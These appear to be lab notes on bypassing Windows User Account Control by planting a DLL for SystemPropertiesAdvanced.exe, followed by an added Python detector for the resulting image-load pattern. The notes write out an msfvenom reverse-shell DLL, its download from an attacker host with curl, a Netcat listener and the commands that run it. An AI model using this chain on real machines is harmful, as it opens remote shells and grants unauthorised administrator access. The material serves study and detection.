
user-account-control

whoami command to check current user information

whoami /user

List members of the administrators group

net localgroup administrators

Display the privileges of the current user

whoami /priv

Query registry to check if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Get the OS version using PowerShell

[environment]::OSVersion.Version

Review the PATH environment variable (per-user directories on the PATH matter for the DLL search order)

cmd /c echo %PATH%

List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

Kill a process by specifying its PID

Generate a reverse TCP shell DLL using msfvenom

Start a Python HTTP server to host the DLL payload

Download the DLL file from the attacker's server using curl

Set up Netcat listener to capture the reverse shell

Execute the DLL payload using rundll32

Open advanced system properties dialog

Confirm the current user after potential privilege escalation

Key Concepts:

  • UAC Functionality:
    - UAC prompts for elevation when applications require administrator privileges.
    - It separates the standard user token from the administrator token.
    - It is a security convenience, not a security boundary.

  • UAC Bypass:
    - Leveraging vulnerabilities or unintended behavior in Windows binaries.
    - DLL hijacking is a common technique.
    - SystemPropertiesAdvanced.exe is an auto-elevating binary.

  • DLL Hijacking:
    - Placing a malicious DLL in a directory where a trusted binary searches for it.
    - The Windows DLL search order is critical.

Approach, Commands, Tools, and Techniques:

  1. UAC and User Information Gathering:
    - whoami /user (Check current user).
    - net localgroup administrators (Verify admin group membership).
    - whoami /priv (Review user privileges).
    - REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA (Check if UAC is enabled).
    - REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin (Check UAC level).
    - [environment]::OSVersion.Version (PowerShell: Check Windows version).
    - cmd /c echo %PATH% (Review PATH environment variable).
    - tasklist /svc | findstr "rundll32" (List running rundll32 processes).
    - taskkill /PID <pid> /F (Kill rundll32 processes).

  2. Malicious DLL Generation and Transfer:
    - msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll (Generate malicious DLL).
    - python3 -m http.server <port> (Start HTTP server).
    - curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll" (Download DLL).

  3. Listener Setup:
    - nc -lvnp <attacker_port> (Start Netcat listener).

  4. Testing and Exploitation:
    - rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll (Test DLL execution).
    - C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (Execute vulnerable binary).

  5. Verification:
    - whoami (Confirm the current user).
    - whoami /priv (Verify elevated privileges).
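Added example, not part of the original notes: a small Python detector written from the defender's side that flags the image-load pattern these steps rely on, an auto-elevating binary loading an unsigned DLL from the user-writable WindowsApps directory. The record layout mimics Sysmon Event ID 7 (ImageLoad) fields; the events, process IDs and user names are constructed, and the list of auto-elevating binaries is an assumption limited to the one this page discusses.

```python
import re

# Auto-elevating binaries to watch. Only the binary from this walkthrough is
# listed (assumption); extend the set from your own inventory.
AUTO_ELEVATING = {"systempropertiesadvanced.exe"}

# Per-user WindowsApps directory: on the user's PATH by default and writable by a
# standard user, which is what lets a planted srrstr.dll win the DLL search.
USER_WRITABLE_DIRS = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\microsoft\\windowsapps\\", re.I
)


def basename(path: str) -> str:
    """Return the file-name part of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_hijack_load(event: dict) -> bool:
    """True when an auto-elevating process loads an unsigned DLL from a
    user-writable directory (the SystemPropertiesAdvanced hijack pattern)."""
    if basename(event["Image"]) not in AUTO_ELEVATING:
        return False
    if not USER_WRITABLE_DIRS.match(event["ImageLoaded"]):
        return False
    # Sysmon reports Signed as the strings "true"/"false"; treat missing as unsigned.
    return event.get("Signed", "false").lower() != "true"


def find_hijack_loads(events):
    """Return (ProcessId, ImageLoaded) pairs that deserve an alert."""
    return [(e["ProcessId"], e["ImageLoaded"]) for e in events if is_hijack_load(e)]


# Constructed sample events in the shape of Sysmon Event ID 7 (ImageLoad).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\ntdll.dll", "Signed": "true"},
    {"ProcessId": 4120, "Image": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\srrstr.dll",
     "Signed": "false"},
    {"ProcessId": 2288, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\srrstr.dll",
     "Signed": "false"},
]

if __name__ == "__main__":
    for pid, dll in find_hijack_loads(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: auto-elevating process loaded unsigned DLL {dll}")
```

Only the second constructed event fires: the signed system DLL and the same unsigned DLL loaded by explorer.exe (not an auto-elevating binary) are left alone, so the rule keys on the combination rather than on the file name.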

Commands:

  • whoami

  • net localgroup administrators

  • REG QUERY

  • cmd /c echo %PATH%

  • tasklist

  • taskkill

  • msfvenom

  • python3 -m http.server

  • curl

  • nc

  • rundll32

Tools:

  • msfvenom (Metasploit)

  • nc (Netcat)

Techniques:

  • UAC bypass.

  • DLL hijacking.

  • Exploiting auto-elevating binaries.

Key Considerations:

  • Windows version and build number are critical for UAC bypass selection.

  • DLL search order.

  • Attacker-controlled IP addresses and ports.

  • Process cleanup.
